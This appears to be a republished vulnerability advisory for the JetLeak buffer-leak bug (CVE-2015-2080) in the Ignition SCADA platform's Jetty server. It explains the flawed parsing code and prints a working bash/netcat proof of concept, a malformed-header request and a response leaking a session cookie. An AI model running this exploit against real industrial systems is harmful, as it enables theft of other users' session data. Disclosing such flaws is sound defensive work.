Inductive Automation Ignition 7.8.1 - Remote Leakage Of Shared Buffers

2016-02-1700:00:00

LiquidWorm

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

5 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

JSON

Inductive Automation Ignition 7.8.1 - Remote Leakage Of Shared Buffers

Inductive Automation Ignition 7.8.1 Remote Leakage Of Shared Buffers
Vendor: Inductive Automation
Product web page: http://www.inductiveautomation.com
Affected version: 7.8.1 (b2016012216) and 7.8.0 (b2015101414)
Platform: Java

Summary: Ignition is a powerful industrial application platform with
fully integrated development tools for building SCADA, MES, and IIoT
solutions.

Desc: Remote unauthenticated atackers are able to read arbitrary data
from other HTTP sessions because Ignition uses a vulnerable Jetty server.
When the Jetty web server receives a HTTP request, the below code is used
to parse through the HTTP headers and their associated values. The server
begins by looping through each character for a given header value and checks
the following:

- On Line 1164, the server checks if the character is printable ASCII or
not a valid ASCII character.
- On Line 1172, the server checks if the character is a space or tab.
- On Line 1175, the server checks if the character is a line feed.
- If the character is non-printable ASCII (or less than 0x20), then all
of the checks above are skipped over and the code throws an ëIllegalCharacterí
exception on line 1186, passing in the illegal character and a shared buffer.


---------------------------------------------------------------------------
File: jetty-http\src\main\java\org\eclipse\jetty\http\HttpParser.java
---------------------------------------------------------------------------
920: protected boolean parseHeaders(ByteBuffer buffer)
921: {
[..snip..]
1163:     case HEADER_VALUE:
1164:         if (ch>HttpTokens.SPACE || ch<0)
1165:         {
1166:             _string.append((char)(0xff&ch));
1167:             _length=_string.length();
1168:             setState(State.HEADER_IN_VALUE);
1169:             break;
1170:         }
1171:
1172:         if (ch==HttpTokens.SPACE || ch==HttpTokens.TAB)
1173:            break;
1174:
1175:         if (ch==HttpTokens.LINE_FEED)
1176:         {
1177:             if (_length > 0)
1178:             {
1179:                 _value=null;
1180:                 _valueString=(_valueString==null)?takeString():(_valueString+" "+takeString());
1181:             }
1182:             setState(State.HEADER);
1183:             break;
1184:         }
1185:
1186:         throw new IllegalCharacter(ch,buffer);
---------------------------------------------------------------------------


Tested on: Microsoft Windows 7 Professional SP1 (EN)
           Microsoft Windows 7 Ultimate SP1 (EN)
           Ubuntu Linux 14.04
           Mac OS X
           HP-UX Itanium
           Jetty(9.2.z-SNAPSHOT)
           Java/1.8.0_73
           Java/1.8.0_66


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2016-5306
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5306.php

CVE: CVE-2015-2080
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2080

Original: http://blog.gdssecurity.com/labs/2015/2/25/jetleak-vulnerability-remote-leakage-of-shared-buffers-in-je.html
Jetleak Test script: https://github.com/GDSSecurity/Jetleak-Testing-Script/blob/master/jetleak_tester.py
Eclipse: http://git.eclipse.org/c/jetty/org.eclipse.jetty.project.git/plain/advisories/2015-02-24-httpparser-error-buffer-bleed.md
         https://github.com/eclipse/jetty.project/blob/jetty-9.2.x/advisories/2015-02-24-httpparser-error-buffer-bleed.md


14.01.2016

---


#######################
#!/bin/bash

#RESOURCEPATH="/main/web/config/alarming.schedule?4674-1.IBehaviorListener.0-demo"
RESOURCEPATH="/main/web/config/conf.modules?51461-4.IBehaviorListener.0-demo"
BAD=$'\a'

function normalRequest {
echo "-- Normal Request --"

nc localhost 8088 << NORMREQ
POST $RESOURCEPATH HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded;charset=utf-8
Connection: close
Content-Length: 63

NORMREQ
}

function badCookie {
echo "-- Bad Cookie --"

nc localhost 8088 << BADCOOKIE
GET $RESOURCEPATH HTTP/1.1
Host: localhost
Coo${BAD}kie: ${BAD}

BADCOOKIE
}

normalRequest
echo ""
echo ""
badCookie

#######################



Original raw analysis request via proxy using Referer:
------------------------------------------------------

GET /main/web/config/conf.modules?51461-4.IBehaviorListener.0-demo&_=1452849939485 HTTP/1.1
Host: localhost:8088
Accept: application/xml, text/xml, */*; q=0.01
X-Requested-With: XMLHttpRequest
Wicket-Ajax: true
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36
Wicket-Ajax-BaseURL: config/conf.modules?51461
Referer: \x00


Response leaking part of Cookie session:
----------------------------------------

HTTP/1.1 400 Illegal character 0x0 in state=HEADER_VALUE in 'GET /main/web/con...461\r\nReferer: \x00<<<\r\nAccept-Encoding...tion: close\r\n\r\n>>>SESSIONID=15iwe0g...\x0fCU\xFa\xBf\xA4j\x12\x83\xCb\xE61~S\xD1'
Content-Length: 0
Connection: close
Server: Jetty(9.2.z-SNAPSHOT)